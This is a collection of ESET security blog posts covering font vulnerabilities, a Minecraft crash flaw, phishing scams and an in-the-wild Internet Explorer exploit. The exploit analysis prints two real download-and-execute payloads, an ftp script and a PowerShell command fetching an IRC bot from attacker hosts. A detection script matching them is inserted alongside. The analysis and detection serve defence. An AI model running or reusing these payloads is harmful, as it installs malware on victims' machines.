Critical vulnerabilities in Windows and Adobe Reader exposed by hacker

A hacker has published an extensive list of Adobe Reader and Windows vulnerabilities based on his research into a relatively obscure area of font management.

Google Project Zero hacker Mateusz Jurczyk found a total of 15 vulnerabilities, any of which could trigger remote code execution or privilege escalation in Adobe Reader or the Windows kernel. However, the two worst (detailed as CVE-2015-3052 for 32-bit and CVE-2015-0093 for 64-bit) exist in the Adobe Type Manager Font Driver, which has existed in the Windows kernel since Windows NT 4.

He told IT blog The Register that the most serious, an ‘entirely reliable’ BLEND instruction exploit, relates to the handling of CharStrings, which are responsible for drawing the shape of each glyph at a particular point size.

“The extremely powerful primitive provided by the vulnerability – together with the fact that it affected all supported versions of both Adobe Reader and Microsoft Windows thus making it possible to create an exploit chain leading to a full system compromise with just a single bug – makes it one of the most interesting security issues I have discovered so far,” Jurczyk said.

“The video demonstrates reliable exploitation of a vulnerability in the handling of the BLEND instruction in Type 1 fonts, used in two stages to first achieve arbitrary code execution in Adobe Reader 11.0.10, and further escape the sandbox and elevate privileges to System by attacking the Adobe Type Manager Font Driver in the Windows 8.1 Update 1 32-bit (or 64-bit) kernel”, he continued.

In a blog post the researcher also shared his presentation from the Recon security conference this month called ‘One font vulnerability to rule them all: A story of cross-software ownage, shared codebases and advanced exploitation.’

As welivesecurity.com recently reported, Google has extended the disclosure period for vulnerabilities uncovered in its Project Zero program by an additional two weeks, if a vendor is planning a patch in the two weeks following the deadline. The additional 14 day ‘grace period’ for vendors will “improve industry response times to security bugs, but will result in softer landings for bugs marginally over deadline”, according to Google.

by Karl Thomas, ESET

Minecraft exploit makes it “easy” for hackers to crash servers

A security researcher has posted a Minecraft flaw that makes it “easy” for hackers to crash the game’s servers, reports Ars Technica.

Developer Anmar Askar first noticed the exploit two years ago and notified the game’s creator, Mojang, but after being “ignored” and given several “highly unsatisfactory responses” he has now published the details on his blog.

According to ZD Net, the exploit concerns how the Minecraft server decompresses and parses data, which, when taken advantage of, can cause a processor load that would exhaust the server’s memory. A fix for the flaw “isn’t exactly that hard,” according to Askar, but the company has failed to address the issue in a series of patches.

“I don’t want to expose thousands of servers to a major vulnerability, yet on the other hand Mojang has failed to act upon it,” he wrote. “Mojang is no longer a small indie company making a little indie game, their software is used by thousands of servers, hundreds of thousands people play on servers running their software at any given time.”

The Register notes that Mojang attempted and failed to patch the flaw after Askar’s blog was published, leaving the game’s servers still vulnerable.

Minecraft was the victim of an attack earlier this year, after 1,800 logins were leaked online in plain text format. It is thought that the data breach could be used to target gamers with phishing attacks that would put their account details at risk.

Microsoft, who purchased Minecraft last year for $2.5 billion, has not yet responded to the latest exploit.

by Kyle Ellison, ESET

No, there’s no Google Lottery, sorry.

Scammers are keeping busy, sending all sorts of attempts to get to your personal info, which they can then proceed to abuse. This week ESET Ireland received a good deal of this particular sort of spam email. As people are conditioned to believe in the credibility of “brand names”, adding “Google”, “Gmail” and “Microsoft Windows” to an otherwise very common scam guarantees the scammers a few additional victims. And stamping “Approved” as a watermark is, in the scammers’ opinion, guaranteed to seal the deal.


Don’t fall for it. Enjoy safer technology.

How was Microsoft Windows exploited in 2014?

Today, we published our research about Windows exploitation in 2014. This report contains interesting information about vulnerabilities in Microsoft Windows and Office patched over the course of the year, drive-by download attacks and mitigation techniques.

The report includes the following information.

  • Vulnerabilities discovered and patched in Microsoft Windows and Office.
  • Statistics about patched vulnerabilities and how they compare with 2013’s statistics.
  • Detailed descriptions of actual exploitation vectors.
  • Vulnerabilities that were exploited in the wild, including a specific table showing ASLR bypass vulnerabilities.
  • Exploitation methods and mitigation techniques for Microsoft’s Internet Explorer web browser (IE).

Last year we saw many exploits that were used for drive-by download attacks. Such attacks are used for silently installing malware. Our report contains detailed information about the nature of drive-by download attacks and how Internet Explorer was improved by Microsoft so that such attacks were mitigated by default.

In the first figure below you can see that Microsoft fixed most of the vulnerabilities in Internet Explorer. Almost all of them belong to the Remote Code Execution type, that is, they can be used to implement drive-by download attacks. This figure includes information about vulnerabilities in Internet Explorer, the Windows GUI subsystem driver, kernel mode drivers, .NET Framework, Windows user mode components and Office.

[Figure: windows exploitation 1]

We can see that a great number of vulnerabilities in the Internet Explorer web browser were closed in 2014. Almost all of these vulnerabilities were of the “Remote Code Execution” (RCE) type. This means that an attacker could execute code remotely in a vulnerable environment with the help of a specially-crafted web page. Such a web page could contain special code, called an exploit, to trigger a specific vulnerability. Usually attackers use such exploits for silently installing malware when they detect a vulnerable Windows version. This attack is an example of a drive-by download, and this is why we highlighted such exploitations as a major trend in attacks on Internet Explorer, as shown in the figure below:

[Figure: windows exploitation 2]

Our report includes a specific section describing mitigation techniques that were introduced by Microsoft in the last year. This section covers Windows, Internet Explorer and the EMET tool. Such security features address several types of attack surface. For example, a feature introduced for IE called Out-of-date ActiveX control blocking is useful for blocking all exploits based on vulnerabilities in old versions of Oracle’s Java plugin.

We also look at Local Privilege Escalation (LPE) attacks that are used by attackers for bypassing the browser’s sandbox or to run unauthorized code introduced by malware in kernel mode. In the last year Microsoft addressed a much smaller number of vulnerabilities for win32k.sys than it did in 2013. Unfortunately, today this driver is a major source of such vulnerabilities and often used by attackers.

First exploitation of Internet Explorer ‘Unicorn bug’ in-the-wild

Microsoft released a patch last week for a critical vulnerability allowing remote code execution in Internet Explorer. This vulnerability, known as CVE-2014-6332, and discovered by an IBM X-Force security researcher, is significant because it exploits an old bug present in Internet Explorer versions 3 through 11. This means that most, if not all, Internet Explorer users are vulnerable unless they are using patched systems. It gets worse: the vulnerability not only can be used by an attacker to run arbitrary code on a remote machine, but it can also bypass the Enhanced Protected Mode (EPM) sandbox in IE11 as well as Microsoft’s free anti-exploitation tool, the Enhanced Mitigation Experience Toolkit (EMET).

Earlier this week, a proof-of-concept (PoC) successfully exploiting this vulnerability on Internet Explorer was made publicly available. In fact, this PoC showed that arbitrary code could be run on a machine merely by visiting a specially crafted website, if using an unpatched version of Internet Explorer. It was thus only a matter of time before we started seeing this vulnerability actively used as part of a cybercriminal campaign. Scouring our data, we found several blocked exploitation attempts while our users were browsing a major Bulgarian website. As you might have guessed, the compromised website was using CVE-2014-6332 to install malware on the computers of its unsuspecting visitors.

Compromised Website details

This news agency website, ranked among the 50 most visited websites in Bulgaria and among the top 11,000 worldwide according to Alexa, might just be part of the first significant in-the-wild use of this vulnerability. As far as we can tell, there is only one page on the website that has been compromised and is serving this exploit, possibly indicating a testing phase. The page is about the winners of a TV reality show.

[Figure: 1_blitz_site]

The page source contains an invisible HTML iframe pointing to the exploit:

[Figure: 2_injected_iframe]

As seen above, the exploit is hosted on the domain natmasla[.]ru. It is detected by ESET as Win32/Exploit.CVE-2014-6332.A.

The exploit is based on proof-of-concept code published by a Chinese researcher. Here are the credits in this original proof-of-concept:

[Figure: 3_credit_exploit]

It is easily modifiable and allows the attacker to write the payload in VBScript.

Strangely, the exploit is actually present twice in a row. The first time, the payload is:

cd %TEMP%&
@echo open carolinasregion.org>%TEMP%\KdFKkDls.txt&
@echo vbs@carolinasregion.org>>%TEMP%\KdFKkDls.txt&
@echo [REDACTED]>>%TEMP%\KdFKkDls.txt&
@echo binary>>%TEMP%\KdFKkDls.txt&
@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! del natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo bye>>%TEMP%\KdFKkDls.txt&
ftp -s:%TEMP%\KdFKkDls.txt&
del %TEMP%\KdFKkDls.txt

It is basically a series of commands that will be executed in the context of cmd.exe. The first group, prefixed by @echo, will write the commands in a text file (“KdFKkDls.txt”, but the name is different each time one pulls the exploit). Then the file is passed to the ftp command. It will connect to an ftp server with a username/password, download a binary, and execute it.

In the second case, the payload is:

powershell.exe (New-Object System.Net.WebClient).DownloadFile('hxxp://natmasla[.]ru/ath/sploit/natmasla.exe','%TEMP%\natmasla.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla.exe')

This time it uses PowerShell to download a binary payload, which is actually the same as the one downloaded by the first payload. During our investigation we observed some network difficulties when we tried to fetch the exploit. That could be the reason for the two payloads with different network resources.

The downloaded binary is detected by ESET as Win32/IRCBot.NHR. This malware has numerous capabilities, such as launching DDoS attacks or opening remote shells for the miscreants. As a funny fact, it contains a quotation from Einstein: “Anyone who has never made a mistake has never tried anything new.”
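As an added example (not part of the ESET post), here is a small Python script a defender could run over process-creation command lines to flag both payload forms described above: the @echo-built ftp script run with ftp -s:, and the PowerShell DownloadFile immediately followed by a launch. The sample command lines are constructed for this example from the payloads quoted above; the two benign lines and the hostnames ftp.example.org and updates.example.org are made up.

```python
import re

# Constructed sample command lines, modelled on the two payload forms quoted
# above. Lines 0 and 1 mirror the exploit's payloads; lines 2 and 3 are benign
# look-alikes made up for this example (example.org hosts are not real IoCs).
SAMPLE_COMMAND_LINES = [
    # Form 1: cmd.exe builds an ftp script with @echo redirects, then runs it with ftp -s:
    r"cmd.exe /c cd %TEMP%&@echo open carolinasregion.org>%TEMP%\KdFKkDls.txt&"
    r"@echo binary>>%TEMP%\KdFKkDls.txt&@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&"
    r"ftp -s:%TEMP%\KdFKkDls.txt&del %TEMP%\KdFKkDls.txt",
    # Form 2: PowerShell downloads a binary and immediately launches it
    r"powershell.exe (New-Object System.Net.WebClient).DownloadFile("
    r"'hxxp://natmasla[.]ru/ath/sploit/natmasla.exe','%TEMP%\natmasla.exe');"
    r"(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla.exe')",
    # Benign: an interactive ftp session, no script file
    r"ftp.exe ftp.example.org",
    # Benign: a download with no execution step in the same command line
    r"powershell.exe (New-Object System.Net.WebClient).DownloadFile("
    r"'http://updates.example.org/notes.txt','C:\work\notes.txt')",
]

# An ftp script file is built with "@echo open <host>> file" lines ...
FTP_SCRIPT_BUILD = re.compile(r"@echo\s+open\s+\S+\s*>", re.IGNORECASE)
# ... and then consumed non-interactively with "ftp -s:<file>".
FTP_SCRIPT_RUN = re.compile(r"\bftp(?:\.exe)?\s+-s:", re.IGNORECASE)
# PowerShell download followed by a launch verb in the same command line.
PS_DOWNLOAD = re.compile(r"\.DownloadFile\s*\(", re.IGNORECASE)
PS_LAUNCH = re.compile(
    r"ShellExecute|Start-Process|Invoke-Item|Invoke-Expression", re.IGNORECASE)


def classify(cmdline):
    """Return the names of the payload patterns that one command line matches."""
    hits = []
    if FTP_SCRIPT_BUILD.search(cmdline) and FTP_SCRIPT_RUN.search(cmdline):
        hits.append("ftp-script-dropper")
    if PS_DOWNLOAD.search(cmdline) and PS_LAUNCH.search(cmdline):
        hits.append("powershell-download-exec")
    return hits


def scan(lines):
    """Scan command lines; return (index, pattern name) pairs for every hit."""
    return [(i, name) for i, line in enumerate(lines) for name in classify(line)]


if __name__ == "__main__":
    for index, name in scan(SAMPLE_COMMAND_LINES):
        print(f"line {index}: {name}")
```

Both rules require the download and the execution step in the same command line, which is what keeps the plain interactive ftp session and the download-only PowerShell line from matching.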

Conclusion

Although we were not able to link this particular incident to a known exploit kit, it is a matter of time before mainstream kits integrate this vulnerability. Since all supported versions of Windows were vulnerable to this exploit before the patch was released last week, we can expect this vulnerability conversion rate to be very high. If you haven’t updated Internet Explorer yet, please take the time to do it right now through Windows Update.

Attention gamers: You’re targets for crime!

Video games have gone from being a small offshoot of the “traditional” computing industry in the late 1970s and early 1980s to a full-fledged multi-billion dollar industry in their own right. Today, companies like Microsoft, Nintendo and SONY generate billions of dollars from sales of games and gaming consoles.

To get an idea of just how pervasive computer gaming is, let’s look at these successful games and consoles, and match them up with some other real-world numbers:

ITEM | NUMBER | EQUIVALENT TO
The Sims | 175 000 000 (copies sold over 15 years) | Combined population of Austria, Belgium, Denmark, Germany, Liechtenstein, Luxembourg, Netherlands, Poland, Slovakia and Switzerland
World of Warcraft | 7 600 000 (avg. # players over last 4 quarters) | Cost of 2014 upgrades (in USD) to Kensington Palace, United Kingdom
8th generation console units | 18 680 000 (PS4+Wii+XBONE units shipped/sold) | Average number of viewers per episode of Big Bang Theory during its 2012-2013 season

Computer gaming is a huge and a wildly successful market, and as in any system that works at scale, there are going to be so-called businessmen or entrepreneurs who “seek to optimize their return on investment through whatever means possible” or, to put it more succinctly, criminals who abuse the ecosystem. But in virtual worlds, can real crimes occur?

The sale of virtual goods (including virtual currencies) is an important part of in-game economies, but it also presents criminals with some unique opportunities, such as theft of in-game goods, counterfeiting items and gold farming. But computer criminals don’t just target gamers: gaming companies themselves can be targeted as well. Probably the most well-known example of this is the April 2011 breach of the SONY PlayStation Network gaming and Qriocity music streaming service, which resulted in the compromise of the names, addresses and credit card details of 77 million user accounts. ESET provided extensive coverage of the SONY data breach in our blog, starting from the initial report of the breach in April 2011 all the way up to the proposed settlement of a week ago.

For the most part, computer gaming poses no additional risks beyond any other activities you might perform on the Internet. You may, however, wish to take a few extra precautions, as outlined in the previous two articles from We Live Security:

This is a shortened version of Aryeh Goretsky’s article on We Live Security. Go here for the full story.

How to hack someone’s account? Ask them for their password!

ESET Ireland has been following a surge of phishing emails redirecting users to faked banking, PayPal and Microsoft account sites for harvesting login details.

Although a surprisingly large number of people still use passwords like “12345” or “password” for their various accounts, cybercriminals have taken an easier route than trying to hack into people’s accounts. “Ask and you shall receive” seems to be their motto, so they send out emails that pretend to come from legitimate sites, notify the user of some unusual activity, and ask them to confirm or deny that activity by “signing into the service”. Except that the service in question isn’t actually there; it is a faked site instead, which diligently logs all usernames and passwords entered and delivers them to the happy scammers.

In the past weeks, ESET Ireland has received several different emails of the same nature, and here are some examples:

1. Bank of Ireland

An email purporting to come from Bank of Ireland, claiming your account requires an update and providing a fake link “Click here to complete update”. The email has some bad spelling errors which give it away.

Fake Bank of Ireland email


2. iTunes

An email pretending to be from iTunes, thanking you for purchasing “World Of Go” for €9.65, then adding “If you did not authorize this purchase, please visit the iTunes Payment Cancellation Form within the next 12 hours in order to cancel the payment,” which requires you to “log in” to the fake iTunes site.

Nice of them to respect our privacy, eh?


3. PayPal

An email looking like a detailed payment receipt, mimicking PayPal, with all the usual PayPal visual clues, claiming you paid $208.00 USD to Agoda Company online hotel booking site, adding “If you haven’t authorized this charge, click the link below to dispute transaction and get full refund – Dispute transaction (Encrypted Link).” The link, of course, isn’t encrypted and simply leads to a PayPal lookalike login harvesting site.

[Figure: paypal1]

Fake link in “Encrypted link”


“expert-italia.it” address instead of “PayPal”

4. Microsoft

An email abusing Microsoft’s name, with the subject line “Microsoft account unusual sign-in activity” that claims they detected unusual sign-in activity into your account, supposedly from South Africa, which is meant to make people suspicious, then offering a solution “If you’re not sure this was you, a malicious user might have your password. Please Verify Your Account and we’ll help you take corrective action.” Of course the only action they’ll be taking is signing into your account with the login details you just provided.

Legitimate looking email.


“yazarlarparlamentosu.org” instead of “Microsoft Corporation”


Actual Microsoft account log in


What should you do?

First of all, stay informed. The scams you know about are less likely to catch you off guard. We regularly keep you updated on our blog here or on ESET’s We Live Security.

Read such mails carefully, checking for clues. If the email has spelling errors or uses poor language, it is likely faked. A lot of the scammers come from countries where English is not their first language, and they give themselves away. The same goes for similar scams as Gaeilge, where they likely used Google Translate to try to fool native Irish speakers.

Do not click on links in emails. Even if you do have a Microsoft account and are alarmed by such an email, open your browser and go to the Microsoft site directly. Also make sure the website’s address looks correct. In the case of the faked Microsoft one above, the website address read “yazarlarparlamentosu.org”, which is clearly not “Microsoft”.

If you suspect you may have fallen for one of these tricks, change your passwords. To be sure, change them in regular intervals anyway.

If the email you received looks like it’s coming from your bank, pick up the phone and ring them instead of just clicking. They’re accustomed to scams like these and will advise you appropriately.

Think before you click and enjoy safer technology!


by Urban Schrott, ESET Ireland
